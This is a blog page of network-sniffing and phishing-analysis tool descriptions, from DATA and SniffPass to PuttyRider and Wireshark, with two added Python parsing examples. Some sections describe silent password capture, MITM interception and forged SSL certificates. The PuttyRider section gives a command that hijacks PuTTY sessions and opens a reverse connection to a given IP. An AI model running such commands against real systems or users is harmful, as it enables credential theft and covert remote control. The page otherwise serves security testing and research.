Showing posts with label Sniffing. Show all posts

DATA - Credential Phish Analysis and Automation


BUCKLEGRIPPER (py)
  • Given a suspected phishing url or file of line separated urls, visit, screenshot, and scrape for interesting files.
  • Requirements can be installed by running or reviewing install_bucklegripper_deps.sh
usage: bucklegripper.py [-h] [-u URL] [-s SOURCE] [-r READFILE] [-a USERAGENT]

Visit a suspected phishing page, screenshot it and pillage it for phishing
archives

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Url to visit
-s SOURCE, --source SOURCE
Apply a source to where this url came from
-r READFILE, --readfile READFILE
Read in a file of URLs one per line
-a USERAGENT, --useragent USERAGENT
Custom User-Agent
Example of reading in a single url
$ python bucklegripper.py -s openphish -u http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html 

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Processing http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html
[+] Screencapped http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html as 20170503-032950-openphish-www.govwebsearch.com.png
[+] Found Zip file at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip
[+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032950-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/
[+] Found php file: http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/post.php
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/
[+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032951-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/
[+] Found Opendir at http://www.govwebsearch.com/apc/
Example of reading in a file of line separated urls
$ python bucklegripper.py -s openphish -r ../../test_urls.txt

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Beginning processing of ../../test_urls.txt

[+] Processing http://onjasela.net/DB/fr/
[+] Screencapped http://onjasela.net/DB/fr/ as 20170503-010034-openphish-onjasela.net.png

[+] Processing http://suesschool.com/yahoologin/yahoologin/clients/login.php
[+] Screencapped http://suesschool.com/yahoologin/yahoologin/clients/login.php as 20170503-010053-openphish-suesschool.com.png
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/clients/
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/login.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/data.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/block.php
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/login.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/data.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/block.php
[+] Found Zip file at http://suesschool.com/yahoologin.zip
[+] Saved http://suesschool.com/yahoologin.zip as 20170503-010125-openphish-suesschool.com-yahoologin.zip
[+] Found Opendir at http://suesschool.com/yahoologin/

[+] Processing http://communitypartnersjc.org/wp-admin/js/index
[+] Screencapped http://communitypartnersjc.org/wp-admin/js/index as 20170503-010138-openphish-communitypartnersjc.org.png

[+] Processing http://ytrdesh.com/info/
[+] Screencapped http://ytrdesh.com/info/ as 20170503-010148-openphish-ytrdesh.com.png

...continues...

BULLYBLINDER (py)
  • While capturing a pcap visit a suspected phishing page. Handle redirectors and obfuscation to find a web form. Scrape the form and make educated guesses at what should be entered into the fields. Submit the form and repeat.
  • Requirements can be installed by running or reviewing install_bullyblinder_deps.sh
usage: bullyblinder.py [-h] -u URL [-a USERAGENT] -i INTERFACE

Visit a suspected phishing page and attempt form filling while getting a pcap

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Url to visit
-a USERAGENT, --useragent USERAGENT
Custom User-Agent to use
-i INTERFACE, --interface INTERFACE
Interface to tell tshark to listen on
Example Usage
$ python bullyblinder.py -i eth0 -u http://www.justpropertydevelopers.com/scanned

.: BULLYBLINDER v0.1 https://github.com/hadojae/DATA/ :.

[+] Preparing pcap: 20170503-033243-www.justpropertydevelopers.com.pcap

[+] Processing http://www.justpropertydevelopers.com/scanned

[+] Submitting POST
[+] Control: <HiddenControl(hidCflag=1)>, Control.Type: hidden, Control.Name: hidCflag, Control.ID: hidCflag
[+] Control: <SelectControl(<None>=[])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*0])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*1])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*2])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*3])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*4])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <TextControl(Email=shannonjudith@gmail.com)>, Control.Type: email, Control.Name: Email, Control.ID: Email
[+] Control: <PasswordControl(Passwd=696969)>, Control.Type: password, Control.Name: Passwd, Control.ID: Passwd
[+] Control: <SubmitControl(signIn=Sign in to view attachment) (readonly)>, Control.Type: submit, Control.Name: signIn, Control.ID: signIn
[+] Control: <CheckboxControl(PersistentCookie=[yes])>, Control.Type: checkbox, Control.Name: PersistentCookie, Control.ID: PersistentCookie
[+] Control: <HiddenControl(rmShown=1) (readonly)>, Control.Type: hidden, Control.Name: rmShown, Control.ID: None

[-] No form found, checking for redirectors and obfuscation.

[+] Found js window.location or document.location, processing the redir

[+] https://drive.google.com/#my-drive appears to be a legitimate website.

[+] Complete! Submitted 1 form(s)

[+] Url Request Chain:
http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php
--http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php

SLICKSHOES (sh)
  • A basic bash script that pulls urls out of pdfs in streams or in clear view.
  • The only argument to the script is the path to a folder containing the pdfs you want to process.
  • REQUIRES pdf-parser.py from https://blog.didierstevens.com/programs/pdf-tools/; its location must be set in the first line of the script
Example Usage
$ ./slickshoes.sh ~/PDFs/
http://4cgemstones.com/polaiowpwwww/GD/index.php
http://80bpm.net/invoice-17524-Apr-26-2017-US-048591/
http://acheirapido.com.br/arquivos/pdf/
http://adams-kuwait.com/REview/office
http://rfaprojects.co.uk/invoice-80633-Apr-24-2017-US-665952/
http://sacm.net/SCANNED/ZN3747CGMSCWC/
https://geloscubinho.com.br/cgi/pdf/index.php
http://afriquecalabashsafaris.com/layouts/GD/index.php
http://akukoomole.com/AdobeLogin/index.php
...continues...
*PINCHERSOFPERIL and BULLYBUSTER are WIP
DATA scripts are a constant work in progress. Feedback, issues, and additions are welcomed.
Proper python packages will be created once sufficient testing and features have been added and more bugs have been squashed.

Troubleshooting
If you have pcap writing issues (observed on some VPS hosts), use the following to fix up the dumpcap permissions:
sudo chgrp YOUR_USER /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap
Be sure to disable NIC features when capturing traffic; run this as root. Checksum errors will cause all sorts of nightmares.
# for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done


probeSniffer - A Tool for Sniffing Unencrypted Wireless Probe Requests from Devices


v2.1 by David Schütz (@xdavidhu)

A tool for sniffing unencrypted wireless probe requests from devices:

new in 2.1:
  • Displaying the number of hosts
  • Logging to SQLite database file
  • Settable nickname for mac addresses
  • Options to filter output by mac address
  • Capturing 'broadcast' probe requests (without ssid)

requirements:
  • Kali Linux / Raspbian with root privileges
  • Python3 & PIP3 (probeSniffer will install the dependencies)
  • A wireless card (capable of monitor mode) and one other internet-connected interface (for vendor resolution)

options:
  • -d / do not show duplicate requests
  • -b / do not show broadcast requests
  • -f / only show requests from the specified mac address
  • --addnicks / add nicknames to mac addresses
  • --flushnicks / flush nickname database
  • --nosql / disable SQL logging completely
  • --debug / turn debug mode on
  • -h / display help menu

installing:

Kali Linux / Raspbian:
$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/probeSniffer

$ cd probeSniffer/

$ python3 -m pip install -r requirements.txt
WARNING: probeSniffer is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

usage:
Make sure to put your interface into monitor mode beforehand!
$ sudo python3 probeSniffer.py [monitor-mode-interface] [options]


SmartSniff v2.16 - Capture TCP/IP packets on your network adapter


SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as a sequence of conversations between clients and servers. You can view the TCP/IP conversations in ASCII mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP) or as a hex dump (for non-text-based protocols, like DNS).

SmartSniff provides 3 methods for capturing TCP/IP packets:
  1. Raw Sockets (only for Windows 2000/XP or greater): allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
  2. WinPcap Capture Driver: allows you to capture TCP/IP packets on all Windows operating systems (Windows 98/ME/NT/2000/XP/2003/Vista). In order to use it, you have to download and install the WinPcap Capture Driver from this Web site (WinPcap is a free open-source capture driver).
    This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
  3. Microsoft Network Monitor Driver (only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to install it manually by using one of the following options:
  4. Microsoft Network Monitor Driver 3: Microsoft provides a new version of the Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic.
    The new version of Microsoft Network Monitor (3.x) is available to download from the Microsoft Web site.

System Requirements

SmartSniff can capture TCP/IP packets on any version of Windows operating system (Windows 98/ME/NT/2000/XP/2003/2008/Vista/7/8) as long as WinPcap capture driver is installed and works properly with your network adapter. 

You can also use SmartSniff with the capture driver of Microsoft Network Monitor, if it's installed on your system.

Under Windows 2000/XP (or greater), SmartSniff also allows you to capture TCP/IP packets without installing any capture driver, by using the 'Raw Sockets' method. However, this capture method has some limitations and problems:
  • Outgoing UDP and ICMP packets are not captured.
  • On Windows XP SP1 outgoing packets are not captured at all - thanks to Microsoft's bug that appeared in the SP1 update...
    This bug was fixed in the SP2 update, but under Vista, Microsoft brought back the outgoing-packets bug of XP/SP1.
  • On Windows Vista/7/8: be aware that the Raw Sockets method doesn't work properly on all systems. It's not a bug in SmartSniff, but in the API of the Windows operating system. If you only see the outgoing traffic, try to turn off the Windows firewall, or add smsniff.exe to the allowed programs list of the Windows firewall.

Password Sniffer Console - Command-line Tool to Sniff and Capture HTTP/FTP/POP3/SMTP/IMAP Passwords


Password Sniffer Console is the all-in-one command-line based Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on the network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols,
  • HTTP (BASIC authentication)
  • FTP
  • POP3
  • IMAP
  • SMTP

In addition to recovering your own lost passwords, you can use this tool in the following scenarios,
  • Run it on the gateway system where all of your network's traffic passes through.
  • In an MITM attack, run it on the middle system to capture the passwords from the target system.
  • On a multi-user system, run it under the Administrator account to silently capture passwords for all the users.

It includes an installer which installs WinPcap, the network capture driver required for sniffing. For Windows 8, you first have to manually install the WinPcap driver (in Windows 7 compatibility mode) and then run our installer to install only Password Sniffer Console.

It is a very useful tool for penetration testers and being a command-line tool makes it suitable for automation.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Requirements
PasswordSnifferConsole requires WinPcap (http://www.winpcap.org), the industry-standard packet capture library for Windows. By default the latest version of WinPcap (v4.1.2 as of this writing) is installed automatically during the installation of Password Sniffer Console.

However if you don't want it, you can uncheck it during installation and later install the latest version manually.


Hyperfox - HTTP and HTTPs Traffic Interceptor


Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully intercepted and recorded.

Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.


SniffPass - Password Monitoring/Sniffing Software (Web/FTP/Email)


SniffPass is a small password monitoring program that listens to your network, captures the passwords that pass through your network adapter, and displays them on the screen instantly. SniffPass can capture the passwords of the following protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords).

You can use this utility to recover lost Web/FTP/Email passwords.

Using SniffPass

In order to start using SniffPass, follow the instructions below:
  1. Download and install the WinPcap capture driver or the Microsoft Network Monitor driver. 
    You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly in many systems.
  2. Run the executable file of SniffPass (SniffPass.exe).
  3. From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use.
    After you select the desired capture options, SniffPass listens to your network adapter, and instantly displays any password that it finds.
  4. In order to verify that the password sniffing works in your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.

Get passwords of another computer on your network?

Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:
  1. You must use a simple hub to connect your computers to the network. All modern switches and routers automatically filter the packets of the other computers, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router.
  2. Your network card must be able to enter into 'Promiscuous Mode'.
  3. You must use WinPCap or Network Monitor Driver as a capture method.
  4. For wireless networks: most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able to capture the passwords of other computers. However, starting from Windows Vista/7, you can capture passwords of wireless networks that are not encrypted, by using Wifi Monitor Mode and Network Monitor Driver 3.x.
    For more information about capturing from wireless networks, read this Blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

Command-Line Options

Command Description
/NoCapDriver Starts SniffPass without loading the WinPcap Capture Driver.
/NoReg Starts SniffPass without loading/saving your settings to the Registry.     


USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)


USBPcap is an open-source USB sniffer for Windows.

PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands


PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to the machine of a sysadmin who has a Putty session open to a Linux server. You can use PuttyRider to take control of the remote server using the existing SSH session.

The tool has been recently presented at Defcamp 2014 – a security conference in Romania.


Examples 
List existing Putty processes and their status (injected / not injected)
PuttyRider.exe -l
Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x

Usage
Operation modes:
-l List the running Putty processes and their connections
-w Inject in all existing Putty sessions and wait for new sessions
to inject in those also
-p PID Inject only in existing Putty session identified by PID.
If PID==0, inject in the first Putty found
-x Cleanup. Remove the DLL from all running Putty instances
-d Debug mode. Only works with -p mode
-c CMD Automatically execute a Linux command after successful injection
PuttyRider will remove trailing spaces and '&' character from CMD
PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h Print this help

Output modes:
-f Write all Putty conversation to a file in the local directory.
The filename will have the PID of current putty.exe appended
-r IP:PORT Initiate a reverse connection to the specified machine and
start an interactive session.

Interactive commands (after you receive a reverse connection):
!status See if the Putty window is connected to user input
!discon Disconnect the main Putty window so it won't display anything
This is useful to send commands without the user to notice
!recon Reconnect the Putty window to its normal operation mode
CMD Linux shell commands
!exit Terminate this connection
!help Display help for client connection


Wireshark v1.10.8 - The world’s foremost network protocol analyzer



Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features

Wireshark has a rich feature set which includes the following:
  • Deep inspection of hundreds of protocols, with more being added all the time
  • Live capture and offline analysis
  • Standard three-pane packet browser
  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  • Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
  • The most powerful display filters in the industry
  • Rich VoIP analysis
  • Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
  • Capture files compressed with gzip can be decompressed on the fly
  • Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
  • Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
  • Coloring rules can be applied to the packet list for quick, intuitive analysis
  • Output can be exported to XML, PostScript®, CSV, or plain text 

Changelog:
The following vulnerabilities have been fixed.
The following bugs have been fixed:
  • VoIP flow graph crash upon opening. (Bug 9179)
  • Tshark with "-F pcap" still generates a pcapng file. (Bug 9991)
  • IPv6 Next Header 0x3d recognized as SHIM6. (Bug 9995)
  • Failed to export pdml on large pcap. (Bug 10081)
  • TCAP: set a fence on info column after calling sub dissector (Bug 10091)
  • Dissector bug in JSON protocol. (Bug 10115)
  • GSM RLC MAC: do not skip too many lines of the CSN_DESCR when the field is missing (Bug 10120)
  • Wireshark PEEKREMOTE incorrectly decoding QoS data packets from Cisco Sniffer APs. (Bug 10139)
  • IEEE 802.11: fix dissection of HT Capabilities (Bug 10166)


WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet



WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and the total number of files for every file type (HTML, Text, Images, and so on).


WebCookiesSniffer - Capture Web site cookies


WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

HTTPNetworkSniffer - Http Sniffer Utility


HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.


Wireshark v1.11.3 - The world’s foremost network protocol analyzer

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.11.3

New and Updated Features
The following features are new (or have been significantly updated) since version 1.11.1:
  • Qt port:
    • The About dialog has been added
    • The Capture Interfaces dialog has been added.
    • The Decode As dialog has been added. It managed to swallow up the User Specified Decodes dialog as well.
    • The Export PDU dialog has been added.
    • Several SCTP dialogs have been added.
    • The statistics tree (the backend for many Statistics and Telephony menu items) dialog has been added.
    • The I/O Graph dialog has been added.
    • The French translation has been updated.
The following features are new (or have been significantly updated) since version 1.11.1:
  • Mac OS X packaging has been improved.
The following features are new (or have been significantly updated) since version 1.11.0:
  • Dissector output may be encoded as UTF-8. This includes TShark output.
  • Qt port:
    • The Follow Stream dialog now supports packet and TCP stream selection.
    • A Flow Graph (sequence diagram) dialog has been added.
    • The main window now respects geometry preferences.
The following features are new (or have been significantly updated) since version 1.10:
  • Wireshark now uses the Qt application framework. The new UI should provide a significantly better user experience, particularly on Mac OS X and Windows.
  • The Windows installer now uninstalls the previous version of Wireshark silently. You can still run the uninstaller manually beforehand if you wish to run it interactively.
  • Expert information is now filterable when the new API is in use.
  • The “Number” column shows related packets and protocol conversation spans (Qt only).
  • When manipulating packets with editcap using the -C <choplen> and/or -s <snaplen> options, it is now possible to also adjust the original frame length using the -L option.
  • You can now pass the -C <choplen> option to editcap multiple times, which allows you to chop bytes from the beginning of a packet as well as at the end of a packet in a single step.
  • You can now specify an optional offset to the -C option for editcap, which allows you to start chopping from that offset instead of from the absolute packet beginning or end.
  • “malformed” display filter has been renamed to “_ws.malformed”. A handful of other filters have been given the “_ws.” prefix to note they are Wireshark application specific filters and not dissector filters.

DNSQuerySniffer - DNS Queries Sniffer


DNSQuerySniffer is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records. 


You can easily export the DNS queries information to csv/tab-delimited/xml/html file, or copy the DNS queries to the clipboard, and then paste them into Excel or other spreadsheet application.
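To show what those fields look like on the wire, here is an added example (not DNSQuerySniffer's code) that decodes a raw DNS message into query ID, request type, response code and the returned records. The response bytes are constructed for the demonstration, and pointer hops are capped so a crafted name-compression loop cannot hang the parser.

```python
"""Decode a raw DNS message (UDP payload) into the fields DNSQuerySniffer
lists: query ID, request type, response code, record count and records."""
import struct
from dataclasses import dataclass, field
from typing import List, Tuple

QTYPES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA"}
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}

@dataclass
class DNSRecord:
    name: str
    rtype: str
    ttl: int
    rdata: str

@dataclass
class DNSMessage:
    query_id: int
    is_response: bool
    rcode: str
    qname: str
    qtype: str
    answers: List[DNSRecord] = field(default_factory=list)

def _unpack(fmt: str, msg: bytes, off: int) -> tuple:
    """struct.unpack with a bounds check: truncated input raises ValueError."""
    size = struct.calcsize(fmt)
    if off + size > len(msg):
        raise ValueError("message truncated at offset %d" % off)
    return struct.unpack(fmt, msg[off:off + size])

def read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Read a possibly compressed name (RFC 1035 4.1.4); return (name, offset
    just past it).  Pointer hops are capped so a crafted pointer loop cannot
    hang the parser."""
    labels: List[str] = []
    end = -1  # fixed by the first pointer, else set after the root label
    hops = 0
    while True:
        if off >= len(msg):
            raise ValueError("name runs past end of message")
        length = msg[off]
        if length & 0xC0 == 0xC0:  # compression pointer
            (ptr,) = _unpack("!H", msg, off)
            if end < 0:
                end = off + 2
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            off = ptr & 0x3FFF
            continue
        off += 1
        if length == 0:  # root label ends the name
            if end < 0:
                end = off
            break
        labels.append(msg[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), end

def parse_dns(msg: bytes) -> DNSMessage:
    qid, flags, qdcount, ancount, _ns, _ar = _unpack("!6H", msg, 0)
    off = 12
    qname = qtype = ""
    for _ in range(qdcount):
        qname, off = read_name(msg, off)
        t, _cls = _unpack("!HH", msg, off)
        off += 4
        qtype = QTYPES.get(t, str(t))
    out = DNSMessage(qid, bool(flags & 0x8000),
                     RCODES.get(flags & 0xF, str(flags & 0xF)), qname, qtype)
    for _ in range(ancount):
        name, off = read_name(msg, off)
        t, _cls, ttl, rdlen = _unpack("!HHIH", msg, off)
        off += 10
        if off + rdlen > len(msg):
            raise ValueError("rdata truncated")
        rd = msg[off:off + rdlen]
        if t == 1 and rdlen == 4:
            text = ".".join(str(b) for b in rd)
        elif t in (2, 5):  # NS / CNAME: rdata is itself a (compressed) name
            text, _ = read_name(msg, off)
        else:
            text = rd.hex()  # other types shown raw
        off += rdlen
        out.answers.append(DNSRecord(name, QTYPES.get(t, str(t)), ttl, text))
    return out

# Constructed sample response: www.example.com A -> CNAME example.com -> 192.0.2.1
SAMPLE_RESPONSE = (
    b"\x12\x34\x81\x80\x00\x01\x00\x02\x00\x00\x00\x00"            # id, flags, counts
    b"\x03www\x07example\x03com\x00\x00\x01\x00\x01"               # question: A IN
    b"\xc0\x0c\x00\x05\x00\x01\x00\x00\x01\x2c\x00\x02\xc0\x10"    # CNAME, ttl 300
    b"\xc0\x10\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04\xc0\x00\x02\x01"  # A, ttl 3600
)
```

Calling `parse_dns(SAMPLE_RESPONSE)` yields query ID 0x1234, request type A, response code NOERROR and two records (the CNAME and the A record).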



[tcpxtract] Tool for Extracting Files from Network Traffic


tcpxtract is a tool for extracting files from network traffic based on file signatures. Extracting files based on file type headers and footers (sometimes called "carving") is an age-old data recovery technique. Tools like Foremost employ this technique to recover files from arbitrary data streams. tcpxtract uses this technique specifically for the application of intercepting files transmitted across a network. Other tools that fill a similar need are driftnet and EtherPEG. driftnet and EtherPEG are tools for monitoring and extracting graphic files on a network and are commonly used by network administrators to police the internet activity of their users. The major limitation of driftnet and EtherPEG is that they only support three file types with no easy way of adding more. The search technique they use is also not scalable and does not search across packet boundaries. tcpxtract features the following:

  • Supports 26 popular file formats out of the box. New formats can be added by simply editing its config file.
  • With a quick conversion, you can use your old Foremost config file with tcpxtract.
  • Custom-written search algorithm is lightning fast and very scalable.
  • Search algorithm searches across packet boundaries for total coverage and forensic quality.
  • Uses libpcap, a popular, portable and stable library for network data capture.
  • Can be used against a live network or a tcpdump-formatted capture file.
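Why searching across packet boundaries matters is easiest to see in code. The following is an added example, not tcpxtract's own implementation: a Python sketch of signature carving with an inline signature table (tcpxtract reads its table from a config file) and constructed sample packets in which a PNG header straddles two TCP segments.

```python
"""Signature-based file carving over a reassembled TCP stream, the technique
tcpxtract describes.  Added example, not tcpxtract's code: the signature
table is inline and the sample packets are constructed for the demonstration."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# kind -> (header bytes, footer bytes or None, maximum size to carve).
# A small table chosen for the demo; a real one would be far larger.
SIGNATURES: Dict[str, Tuple[bytes, Optional[bytes], int]] = {
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 1 << 20),
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 1 << 20),
    "gif": (b"GIF89a", b"\x00;", 1 << 20),
    "pdf": (b"%PDF-", b"%%EOF", 4 << 20),
    "zip": (b"PK\x03\x04", None, 4 << 20),  # no footer: carve up to max size
}


@dataclass
class Carved:
    kind: str
    offset: int   # byte offset of the header within the stream
    data: bytes


def carve_stream(stream: bytes) -> List[Carved]:
    """Carve every file whose header appears in one contiguous byte stream.

    The scan only moves forward, so a carved file's body is not rescanned for
    other headers, and each footer search is capped at the format's max size."""
    found: List[Carved] = []
    pos = 0
    while pos < len(stream):
        best: Optional[Tuple[int, str]] = None  # earliest header at or after pos
        for kind, (hdr, _ftr, _mx) in SIGNATURES.items():
            idx = stream.find(hdr, pos)
            if idx != -1 and (best is None or idx < best[0]):
                best = (idx, kind)
        if best is None:
            break
        start, kind = best
        hdr, ftr, max_size = SIGNATURES[kind]
        end = None
        if ftr is not None:
            j = stream.find(ftr, start + len(hdr), start + max_size)
            if j != -1:
                end = j + len(ftr)
        if end is None:  # no footer, or none within max size: take what we can
            end = min(len(stream), start + max_size)
        found.append(Carved(kind, start, stream[start:end]))
        pos = end
    return found


def carve_per_packet(packets: List[bytes]) -> List[Carved]:
    """Search each packet payload on its own: the coverage limitation the text
    ascribes to driftnet and EtherPEG.  A header split across two packets is
    never matched."""
    found: List[Carved] = []
    for pkt in packets:
        found.extend(carve_stream(pkt))
    return found


def carve_packets(packets: List[bytes]) -> List[Carved]:
    """tcpxtract-style: reassemble the payloads in order, then carve once over
    the whole stream so packet boundaries are invisible to the search."""
    return carve_stream(b"".join(packets))


# Constructed sample: an HTTP response whose PNG body starts at the tail of one
# TCP segment and continues in the next, splitting the 8-byte PNG header.
PNG_FILE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 20 + b"IEND\xaeB`\x82"
SAMPLE_PACKETS = [
    b"HTTP/1.1 200 OK\r\n\r\n" + PNG_FILE[:3],
    PNG_FILE[3:] + b"<trailing bytes>",
]


def demo() -> Tuple[int, int]:
    """Returns (files found per packet, files found across the stream)."""
    return len(carve_per_packet(SAMPLE_PACKETS)), len(carve_packets(SAMPLE_PACKETS))


if __name__ == "__main__":
    for c in carve_packets(SAMPLE_PACKETS):
        print(f"{c.kind} at offset {c.offset}, {len(c.data)} bytes")
    print("per-packet search found %d file(s), stream search found %d" % demo())
```

On the sample, the per-packet search finds nothing while the stream search recovers the complete PNG at offset 19.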

[Intercepter-ng] Network Sniffer with SSLstrip for Android


Intercepter-NG is an application that lets us capture the data traffic on the local network we are connected to. This tool offers protocol analyzer functionality in the purest Wireshark style, although with far fewer options. With Intercepter-ng we can see the cookies of the different connections being made, as well as carry out attacks against SSL with SSLStrip.

